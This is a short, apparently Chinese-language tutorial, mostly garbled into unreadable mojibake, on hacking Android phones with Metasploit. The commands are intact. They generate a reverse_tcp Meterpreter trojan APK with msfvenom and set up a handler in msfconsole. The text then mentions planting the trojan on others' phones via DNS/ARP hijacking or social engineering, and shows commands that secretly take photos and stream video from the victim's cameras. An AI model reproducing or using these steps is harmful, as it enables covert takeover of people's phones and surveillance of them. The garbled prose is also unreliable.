如题所述
æ¢ç¶æ¯å ¥ä¾µå®åææºï¼è¯å®è¦å é ç½®ä¸ä¸ªå®åæ¨é©¬ï¼é£æ们ççæ¬æºçIP
æ¬æºIPï¼192.168.1.6
å¨å°ç»ç«¯è¾å ¥å½ä»¤ï¼msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk
以åçMSFèçæ¬æ¯ç¨msfpayloadçææ¨é©¬ ç°å¨å¨æ°çæ¬ä¸é½ç¨msfvenom代æ¿äºï¼æ以æäºæåå¨ç»ç«¯è¾å ¥msfpayloadçæ¶å ä¼æ示
msfpayloadæ æ³æ¾å°å½ä»¤ æ以使ç¨msfvenomå³å¯ï¼è¿éLHOST 对åºçæ¯æ¬æºçIPå°å LPORT对åºä½ è¦çå¬çç«¯å£ ç¶åçææ¨é©¬çè·¯å¾
è¿æ ·æ们就å¨/root/è·¯å¾ä¸çæäºä¸ä¸ªAPKçå®åæ¨é©¬æ件ï¼è³äºæ¨é©¬çå ææä¸ä¸è°ãç°å¨æ们å¨æ¥å¯å¨MSFå·¥å ·
è¾å ¥å½ä»¤ï¼msfconsole
ç¶åè¾å ¥ï¼
1. use exploit/multi/handler å 载模å
2. set payload android/meterpreter/reverse_tcp éæ©Payload
3.show options æ¥çåæ°è®¾ç½®
æ们çè§payloadéè¾¹æ两个åæ°è¦è®¾ç½® LHOSTåLPORT 表示å°ååç«¯å£ é»è®¤ç端å£æ¯4444 ç°å¨æ们æ¥æ´æ¹è®¾ç½®
1.set LHOST 192.168.1.6 è¿éçå°å设置ææ们åæçææ¨é©¬çIPå°å
2.set LPORT 5555 è¿éç端å£è®¾ç½®æåææ们çææ¨é©¬æçå¬ç端å£
3.exploit å¼å§æ§è¡æ¼æ´ å¼å§çå¬...
OKï¼ä¸ååå¤å·¥ä½åå¤å°±ç»ªãããç°å¨è¦åçå°±æ¯ææ¨é©¬æ件æå°äººå®¶çææºä¸ï¼æè·¯æå¾å¤ å¯ä»¥DNS arpå«ææ¬ºéª åªè¦å¯¹æ¹ç¨ææºä¸è½½æ件 å°±ä¼ä¸è½½æ们çæ¨é©¬æ件
è¿æ社工ä»ä¹çççï¼è¿éæå°±ç®åçææ¨é©¬æ件å¼æèªå·±çææºä¸åæµè¯
å®è£ å®æå ä¼å¨æ¡é¢ä¸çæä¸ä¸ªMainActivityçç¨åºå¾æ è¿ä¸ªå°±æ¯æ们åæçæçæ¨é©¬ å½æ们ç¹å»äºè¿ä¸ªå¾æ ææºä¼æ²¡æä»»ä½ååº å ¶å®æ¨é©¬å·²ç»å¼å§è¿è¡èµ·æ¥äº
æ们å¯ä»¥å¨æ们çMSFéçè§æä¸ä¸ªä¼è¯è¿æ¥äº
è¿æ ·å¯¹æ¹çææºå°±å°±è¢«æ们æ§å¶äºï¼æ¥çææºç³»ç»ä¿¡æ¯ï¼è¾å ¥å½ä»¤ sysinfo
webcam_listæ¥çææºæ影头æå 个 è¿éæ¾ç¤ºä¸¤é¡¹ åå«è¡¨ç¤ºæåå两个æå头
webcam_snap éç§æç §åè½
åè¾¹è·ä¸åæ°-i æå®ä½¿ç¨é£ä¸ªæå头æç §
å¯ä»¥çè§æ们åå«å¯¹ååæå头é½æäºç § ä¿åå°äºæ¡é¢ä¸
è¿å¯ä»¥è¾å ¥å½ä»¤ webcam_stream å¼å¯æå头
